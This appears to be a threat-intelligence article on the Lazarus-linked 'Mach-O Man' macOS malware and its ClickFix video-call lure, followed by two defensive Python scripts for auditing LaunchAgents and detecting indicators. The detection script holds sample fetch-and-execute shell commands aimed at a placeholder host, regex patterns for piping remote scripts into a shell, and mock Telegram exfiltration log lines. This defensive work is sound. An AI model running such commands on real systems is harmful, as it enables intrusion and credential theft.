Mach-O Man, the Lazarus malware that turns video calls into a risk for Macs in crypto and fintech

  • Attack attributed to the Lazarus group against crypto, fintech and DeFi executives who use Macs.
  • The Mach-O Man kit is distributed using the ClickFix social engineering technique in fake video calls.
  • The malware steals credentials, macOS keychain contents, session cookies and wallet access, and the stolen data is exfiltrated via Telegram.
  • Companies in Spain and the rest of Europe that use macOS in high-responsibility roles are considered priority targets.

Malware on Macs targeting crypto and fintech

The emergence of Mach-O Man, a new kit of native malware for macOS attributed to the North Korean group Lazarus, has set off alarm bells across the global cryptocurrency and fintech ecosystem. The threat is not limited to large exchanges or DeFi protocols; it also directly affects European and Spanish companies that rely on Macs in their executive, treasury and development departments.

We are facing a campaign that turns a work video call into a potential entry point to the corporate infrastructure. Instead of relying on a technical vulnerability, Mach-O Man combines highly refined social engineering with modules specialized in stealing credentials, macOS keychain contents and wallet access, which multiplies the risk for companies that handle large volumes of digital capital.

The Lazarus Group and its goals in crypto, DeFi and fintech

Behind Mach-O Man is the Lazarus Group, also known as Famous Chollima, one of the most active cyber-operations units linked to North Korea. Various security reports estimate that the group has amassed around $6.7 billion in cryptocurrency thefts since 2017, with hits on platforms such as KelpDAO, Drift, Bybit and Zerion.

Research from teams like CertiK, Bitso's Quetzal Team, and independent analysts suggests that Mach-O Man is part of a sustained financial strategy by the North Korean state. This would not be an isolated campaign, but rather another piece in a larger scheme aimed at draining capital from the crypto, DeFi, and fintech sectors.

According to CertiK researcher Natalie Newson, the crypto industry should start looking at Lazarus the way traditional banks look at state actors: as a continuous, well-funded and persistent threat. In just a few weeks, more than $500 million has been diverted through exploits linked to protocols such as Drift and KelpDAO, reinforcing the idea of a coordinated offensive.

Lazarus's current focus is profiles with highly sensitive access within high-value organizations: fintech executives, Web3 developers, product managers, and treasury teams working at exchanges, DeFi projects, and regulated crypto service providers. Many of them, especially in Europe and Spain, use Macs on a daily basis.

For companies based in cities like Madrid, Barcelona, Valencia, Malaga, Berlin or Amsterdam, where neobanks, institutional custodians and crypto startups are concentrated, the message is clear: if you handle digital liquidity, DeFi integrations or critical SaaS infrastructure from macOS, you fall squarely into the Mach-O Man risk profile.

What is Mach-O Man and how is it built?

Mach-O Man is described as a modular malware kit for macOS. Developed by the Chollima division of the Lazarus Group, it is written in Go and compiled as native Mach-O binaries, the standard executable format on macOS, for both Intel and Apple Silicon processors.

The choice of Go and the native Mach-O format lets the kit's components run as ordinary macOS executables (a statically linked Go binary carries its own runtime and needs nothing installed on the victim machine), sidestepping some of the friction that trips up less carefully built payloads. This matters because a large number of crypto and fintech companies use Macs in key management, legal, commercial and technical positions.

The kit works in multiple linked stages, and each component has a specific function: downloading further binaries, gathering system information, establishing persistence and, finally, large-scale data theft. Its modular design lets the attackers tailor the campaign to the type of victim and the financial objective of each operation.

One of Mach-O Man's most sensitive capabilities is its interaction with the macOS keychain, where the system stores passwords, private keys, recovery phrases and other secrets. In addition, the kit's modules inspect browser data and extensions in Chrome, Safari, Firefox, Brave, Opera and Vivaldi, which opens the door to the theft of session cookies, access tokens and saved credentials.

Researchers have even observed programming errors in some components, including a bug that causes an infinite loop and abnormal CPU usage. A flaw like this can give the malware's presence away, and it suggests the kit was deployed somewhat hastily, perhaps to exploit specific attack windows before defenders could adjust their controls.

ClickFix: The video call trap that compromises your Mac

The most unsettling aspect of Mach-O Man is not only its code but how it gets onto machines. Instead of exploiting a classic technical flaw, the campaign relies on a social engineering technique called ClickFix, which tricks the user into running the malicious command themselves, believing they are performing a routine support step.

The scheme usually starts with an urgent meeting invitation sent via Telegram. The message promises a video call on Zoom, Microsoft Teams or Google Meet and, in many cases, looks entirely legitimate because it comes from the compromised accounts of real contacts: industry colleagues, business partners, suppliers or even trusted technical staff.

On clicking, the victim is redirected to a fake but very convincing website that mimics the look of the video-calling platform or of services like Cloudflare. There, a supposed connection or compatibility error appears, along with a seemingly innocuous fix: copy and paste a short command into the macOS Terminal to "fix the problem".

That command is the heart of the deception. When executed, it downloads and launches the malware's initial stager, often a binary with a name like teamsSDK.bin fetched with curl. Because the user runs the command themselves in Terminal, and because curl does not tag what it downloads with the com.apple.quarantine attribute the way a browser does, Gatekeeper never gets a chance to evaluate the binary, so the automated defenses that would challenge a browser download are not triggered.

In some documented incidents, attackers linked to Lazarus have gone as far as hijacking DeFi project domains and replacing their websites with a fake Cloudflare message that prompts users to run a verification command. The pattern is identical: disguising a critical security step as a simple technical check.

The four phases of the attack: from infection to credential theft

Once the victim has fallen for the ClickFix trap and run the command, Mach-O Man deploys an attack flow in four major stages, described in detail by Bitso's Quetzal Team and other analysts.

In the first, the stager downloads and runs additional binaries written in Go, signed with certificates created specifically to appear legitimate. At this point a fake application package may appear requesting the macOS password; researchers have even observed that the login window "shakes" on the first two attempts and accepts the password on the third, an interface trick that reinforces the feeling of normality. It is worth noting that the login keychain is protected by the user's account password, so a captured password is exactly what a later keychain-theft stage needs.

The second phase focuses on system profiling. One module gathers as much information as possible about the machine: hostname, UUID, CPU type, macOS version, running processes, network configuration and the extensions installed in the major browsers. With this data the attackers assess the value of the target and adapt the rest of the operation accordingly.

In the third stage, the malware establishes a persistence mechanism. To do this, it installs a component disguised as an application called OneDrive in a hidden location, usually a folder with a name like "Antivirus Service", and registers a LaunchAgent whose property list is named com.onedrive.launcher.plist. This ensures the component runs automatically every time the user logs in.

The fourth and final phase activates a stealer specializing in sensitive data. Identified in some analyses as macrasv2, this module collects the SQLite databases that hold browser credentials and session cookies, wallet extension data, macOS keychain entries and anything else that could give direct access to funds and internal systems. The content is compressed and sent out through the Telegram bot API.

The link to cryptocurrency theft is immediate: the macOS keychain can contain private keys, seed phrases and passwords for exchange platforms. Combined with live session cookies and access tokens, these credentials let the attackers operate on the victim's funds without having to defeat any further controls or raise immediate suspicion.

Telegram as a channel for exfiltration and self-destruction of malware

One particularly striking feature of Mach-O Man is its extensive use of Telegram as a command and exfiltration channel. The stealer sends the stolen data through requests to the platform's bot API, blending part of its traffic with a service that many organizations use legitimately.

The researchers have even identified Telegram bot tokens embedded in the binaries. This operational oversight could be exploited to monitor the malicious channels or even disrupt part of the command-and-control infrastructure, since anyone holding the token can call the same bot API. Even so, as long as these bots remain active, the flow of information to Lazarus operators stays relatively discreet.

Mach-O Man also includes self-destruction features. After completing its primary tasks, many of its components delete themselves with commands like `rm`, removing local traces of the infection. By the time the affected company notices unusual behaviour or a theft of funds, the malware may already be gone from the computer.

This "quick and clean hit" approach significantly complicates subsequent forensic analysis. Without clear artifacts on the system, security teams have to rely on network logs, endpoint telemetry recorded at execution time, residual signals and event correlation to reconstruct the incident. In European environments where fleets of Macs are managed by neobanks, payment providers or tokenized-asset managers, this lack of a clear footprint makes it difficult to measure the true extent of the access the attackers gained.

In fact, experts like Natalie Newson stress that many victims are still unaware they have been compromised. And even when they suspect it, they will not always be able to identify which specific variant of Mach-O Man was involved or how much information was taken, which adds uncertainty to the response and internal communication phase.

Relationship with major robberies and context for Europe and Spain

Mach-O Man did not appear out of nowhere: it is the latest in a long line of attacks attributed to Lazarus against the crypto and fintech ecosystem worldwide. These include massive thefts from DeFi protocols, centralized exchanges and wallet providers, with figures that in some cases exceed one billion dollars.

Cases such as the KelpDAO hack, the Drift exploit or the Bybit attack, worth around $1.4 billion, demonstrate Lazarus's ability to combine in-depth infrastructure knowledge with extremely fast and precise operations. On another level, "smaller" incidents, such as the theft of approximately $100,000 from Zerion using AI-assisted social engineering, show that the group is equally comfortable with high-profile heists and with ongoing, more discreet but repeated campaigns.

In this context, Mach-O Man fits a people-centric attack model. Instead of going after the code of a smart contract, the campaign targets the people responsible for treasuries, administrative keys and internal access. The ultimate goal is the same, seizing the funds, but the path runs through the human element.

For Europe, where the supply of regulated crypto services and next-generation fintech has expanded significantly, this represents a shift in the landscape. Banks with digital banking divisions, asset managers exploring tokenization, and payment companies offering crypto services are now part of a shared risk map with purely Web3 exchanges.

In Spain, technology hubs such as Madrid, Barcelona, Valencia or Malaga concentrate crypto startups, alternative investment platforms and DeFi projects with significant exposure to digital assets. Many of these players use macOS extensively in management, compliance, business development and operations roles, placing them squarely on the radar of campaigns like Mach-O Man.

Why it's so difficult to detect: the human factor as a weak point

One of the keys to Mach-O Man's success is that it does not exploit a classic technical vulnerability but a human weakness. The attack relies on the victim pasting a command into their Mac's Terminal, believing they are resolving a connection problem or validating an urgent video call.

Traditional security controls are better equipped to identify suspicious attachments, unauthorized executables or automated exploits than to stop a command the user runs deliberately. If the command arrives wrapped in a credible context (a last-minute meeting with a key partner, a supposed Cloudflare notification, a message that appears to come from a known supplier), the probability that someone will run it rises significantly.

The campaign takes advantage of a widespread reality in technology and finance companies: tight schedules, constant video calls and decisions under pressure. In that environment, an impromptu meeting or a "routine" technical step does not usually raise much suspicion, especially if it arrives through a channel like Telegram, where many crypto communities operate daily.

Furthermore, Mach-O Man's modular nature complicates the task of writing reliable static signatures. Analysts like Vladimir S have detected multiple variants of the attack, meaning the components can change rapidly even while the social script stays the same. If defenses rely solely on classic indicators, the attackers keep room to adapt the campaign.

On top of all this, there is the malware's ability to delete itself after completing its mission. When a drain of funds or unusual activity is detected in corporate accounts, the trail on the compromised Mac may be minimal, making it harder to attribute the incident to Mach-O Man quickly and accurately.

Practical steps for crypto and fintech companies using macOS

The cybersecurity teams that have analyzed Mach-O Man have put forward a number of concrete recommendations for European and Spanish organizations that use Macs in positions of high responsibility and exposure to digital assets.

On a technical level, it is suggested to carry out periodic audits of the LaunchAgents directories (the user's ~/Library/LaunchAgents as well as the system-wide /Library/LaunchAgents and /Library/LaunchDaemons), looking for suspicious entries and paying particular attention to references such as com.onedrive.launcher.plist or OneDrive processes running from unusual paths, for example hidden folders with names like "Antivirus Service". This scan can be automated with scripts or integrated into fleet management platforms.
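As an added example, not code from the article or from any of the research teams it cites, the following Python script implements the LaunchAgents audit recommended here and covers the persistence stage described above. It parses every property list in a LaunchAgents directory and flags the two indicators the article names (the com.onedrive.launcher label and a program path containing "Antivirus Service") plus three heuristics added for this example rather than taken from the published analyses: a program living in a dot-prefixed hidden directory, a OneDrive-named binary outside /Applications, and a program outside the usual install prefixes. The two plists written by demo() are constructed for illustration.

```python
"""Audit macOS LaunchAgents for Mach-O Man-style persistence (added example)."""
import os
import plistlib
import tempfile

# Indicators taken from the published description of the persistence stage.
KNOWN_BAD_LABELS = {"com.onedrive.launcher"}
KNOWN_BAD_PATH_FRAGMENTS = ("antivirus service",)
# Heuristic (not from the analyses): where legitimate agent binaries normally live.
TRUSTED_PREFIXES = ("/Applications/", "/System/", "/usr/", "/Library/Apple/",
                    "/opt/homebrew/")


def program_path(plist):
    """Return the executable a LaunchAgent runs (Program, else ProgramArguments[0])."""
    if plist.get("Program"):
        return str(plist["Program"])
    args = plist.get("ProgramArguments") or []
    return str(args[0]) if args else ""


def assess(label, program):
    """Return the reasons a LaunchAgent looks suspicious; an empty list means clean."""
    reasons = []
    lower = program.lower()
    if label.lower() in KNOWN_BAD_LABELS:
        reasons.append(f"known label {label}")
    for frag in KNOWN_BAD_PATH_FRAGMENTS:
        if frag in lower:
            reasons.append(f"program path contains '{frag}'")
    # Heuristic: a dot-prefixed directory component hides the payload from Finder and ls.
    if any(p.startswith(".") and p not in (".", "..") for p in program.split("/")[:-1]):
        reasons.append("program lives in a hidden directory")
    # Heuristic: a OneDrive-named binary that is not the real client under /Applications.
    if "onedrive" in os.path.basename(lower) and not lower.startswith("/applications/"):
        reasons.append("OneDrive-named binary outside /Applications")
    # Low-signal heuristic: agents outside the usual prefixes deserve a manual look.
    if program and not program.startswith(TRUSTED_PREFIXES):
        reasons.append("program outside trusted install prefixes")
    return reasons


def audit_launch_agents(directory):
    """Parse every .plist in directory; return {filename: reasons} for flagged agents."""
    findings = {}
    if not os.path.isdir(directory):
        return findings
    for name in sorted(os.listdir(directory)):
        if not name.endswith(".plist"):
            continue
        try:
            with open(os.path.join(directory, name), "rb") as fh:
                plist = plistlib.load(fh)
        except Exception as exc:  # a plist that will not parse is itself worth a look
            findings[name] = [f"unparseable plist: {exc}"]
            continue
        reasons = assess(str(plist.get("Label", "")), program_path(plist))
        if reasons:
            findings[name] = reasons
    return findings


def demo():
    """Run the audit on two constructed plists: one benign, one mimicking Mach-O Man."""
    directory = tempfile.mkdtemp(prefix="launchagents-demo-")
    samples = {
        "com.example.updater.plist": {
            "Label": "com.example.updater",
            "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/updater"],
            "RunAtLoad": True,
        },
        "com.onedrive.launcher.plist": {  # constructed, modelled on the described persistence
            "Label": "com.onedrive.launcher",
            "ProgramArguments": ["/Users/alice/Library/.Antivirus Service/OneDrive"],
            "RunAtLoad": True,
        },
    }
    for name, plist in samples.items():
        with open(os.path.join(directory, name), "wb") as fh:
            plistlib.dump(plist, fh)
    return audit_launch_agents(directory)


if __name__ == "__main__":
    # Real run: the current user's agents plus the system-wide directories.
    for d in ("~/Library/LaunchAgents", "/Library/LaunchAgents", "/Library/LaunchDaemons"):
        for name, reasons in audit_launch_agents(os.path.expanduser(d)).items():
            print(f"{d}/{name}: {'; '.join(reasons)}")
```

The last heuristic will flag legitimate user-installed agents that run from places like ~/Library/Application Support, so treat it as a review queue rather than an alert; the known-label, "Antivirus Service" and hidden-directory reasons are the ones worth paging on.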

It is also recommended to monitor or limit traffic to the Telegram bot API from corporate machines, especially in environments with no justified use of Telegram bots. While it will not always be feasible to block Telegram entirely, finer-grained controls can be applied to this kind of communication, reducing the data exfiltration surface. Note that without TLS inspection a proxy sees only the hostname api.telegram.org, not the bot token or method in the URL, so the useful alert is simply any connection to that host from a machine with no approved bot use.

In the area of internal awareness, experts emphasize a simple but crucial message: never paste a command from an unverified webpage or meeting link into the Terminal. This idea, which may seem like common sense, requires continuous training, practical examples and simulations, especially in teams that are always in a hurry and receive a constant stream of video call invitations.

Another basic tip is to verify through an alternative channel any urgent invitation that includes unusual technical steps. If a supposed colleague asks you to run a command in the Terminal, confirm it via company email, official internal messaging or a phone call before doing anything. This double check, although somewhat cumbersome, drastically reduces the chances of falling for scams like ClickFix.

Finally, it is recommended that organizations based in Spain and the rest of the European Union integrate the indicators of compromise associated with Mach-O Man into their detection and response tools: hashes of identified binaries, related IP addresses, suspicious command patterns in the Terminal and alerts for anomalous CPU spikes in unknown processes. Even if the malware tries to self-destruct, these traces can help detect intrusion attempts or ongoing infections.
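As an added example, not the article's code nor anything published by the teams it cites, the following Python script turns two of the indicator classes listed above into detection logic: ClickFix-style command lines of the kind described in the infection section (a curl or wget fetch piped into a shell, a download followed by chmod +x, a base64 blob decoded into a shell, a .bin download like teamsSDK.bin) and Telegram bot API calls in proxy logs, as discussed in the exfiltration section. The regular expressions are generic heuristics written for this example, and the sample commands, proxy log lines and bot token are constructed for illustration (the token has only the shape of a real one).

```python
"""Scan endpoint command lines and proxy logs for Mach-O Man indicators (added example)."""
import re

# ClickFix-style one-liners: the user pastes a command that fetches and runs a payload.
# Heuristics written for this example, not signatures taken from the published analyses.
CLICKFIX_PATTERNS = (
    (re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba|z)?sh\b"), "remote script piped straight into a shell"),
    (re.compile(r"\b(curl|wget)\b.*\bchmod\s+\+?x\b"), "download followed by chmod +x"),
    (re.compile(r"\bbase64\s+(-d|-D|--decode)\b.*\|\s*(ba|z)?sh\b"), "base64-decoded payload piped into a shell"),
    (re.compile(r"\b(curl|wget)\b.*\.bin\b"), "download of a .bin payload (the teamsSDK.bin pattern)"),
)

# Telegram bot tokens look like "<bot id>:<secret>"; the secret length (35 characters in
# publicly documented tokens) is matched loosely here on purpose.
TELEGRAM_HOST = re.compile(r"\bapi\.telegram\.org\b")
TELEGRAM_BOT_CALL = re.compile(r"api\.telegram\.org/bot(\d+):([A-Za-z0-9_-]{30,50})/(\w+)")


def classify_command(cmd):
    """Return a description of every ClickFix heuristic the command line trips."""
    return [why for pattern, why in CLICKFIX_PATTERNS if pattern.search(cmd)]


def find_telegram_exfil(lines):
    """Flag proxy log lines that touch the Telegram bot API.

    With TLS inspection the bot id and method (sendDocument = file upload) are visible;
    without it only the hostname is, so a bare host match is still reported.
    Log format assumed: "<timestamp> <client> <verb> <url or host> <status> [<bytes>]".
    """
    hits = []
    for n, line in enumerate(lines, 1):
        if not TELEGRAM_HOST.search(line):
            continue
        fields = line.split()
        hit = {"line": n, "client": fields[1] if len(fields) > 1 else "?",
               "bot_id": None, "method": None}
        m = TELEGRAM_BOT_CALL.search(line)
        if m:
            hit["bot_id"], hit["method"] = m.group(1), m.group(3)  # secret deliberately not kept
        hits.append(hit)
    return hits


# Constructed samples, not taken from a real incident.
SAMPLE_COMMANDS = [
    "brew update && brew upgrade",
    "git clone https://example.invalid/repo.git",
    "curl -fsSL https://example.invalid/fix.sh | bash",
    "curl -o /tmp/teamsSDK.bin https://example.invalid/teamsSDK.bin && chmod +x /tmp/teamsSDK.bin && /tmp/teamsSDK.bin",
    "echo ZWNobyBoaQ== | base64 -D | sh",
]
FAKE_TOKEN = "123456789:AAH" + "x" * 32  # constructed: the shape of a bot token, not a real one
SAMPLE_PROXY_LOG = [
    "2025-01-15T10:02:11Z 10.20.0.7 CONNECT api.telegram.org:443 200",
    f"2025-01-15T10:02:12Z 10.20.0.7 POST https://api.telegram.org/bot{FAKE_TOKEN}/sendDocument 200 1843219",
    f"2025-01-15T10:02:13Z 10.20.0.7 POST https://api.telegram.org/bot{FAKE_TOKEN}/sendMessage 200 412",
    "2025-01-15T10:03:40Z 10.20.0.9 GET https://web.telegram.org/ 200 5120",
]


def scan_samples():
    """Run both detectors over the constructed samples; returns (command hits, proxy hits)."""
    cmd_hits = {cmd: classify_command(cmd) for cmd in SAMPLE_COMMANDS}
    return cmd_hits, find_telegram_exfil(SAMPLE_PROXY_LOG)


if __name__ == "__main__":
    cmd_hits, proxy_hits = scan_samples()
    for cmd, reasons in cmd_hits.items():
        print(("FLAG " if reasons else "ok   ") + cmd, reasons)
    for hit in proxy_hits:
        print("telegram", hit)
```

In practice classify_command would run over process-creation events whose parent is Terminal or another shell, and find_telegram_exfil over proxy or DNS logs; the bot id is kept so that sightings can be correlated across machines, while the secret is dropped because the log line itself would otherwise become a credential worth protecting.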

The Mach-O Man campaign illustrates how the combination of modular malware, social engineering and covert exfiltration channels can turn a seemingly innocent video call into the trigger for a critical breach. In an increasingly regulated European environment with growing exposure to digital capital, and especially in Spanish companies that rely on macOS in decision-making roles, strengthening security culture, being wary of improvised commands and validating emergencies through more than one channel is becoming a basic necessity for protecting credentials, systems and digital wallets.
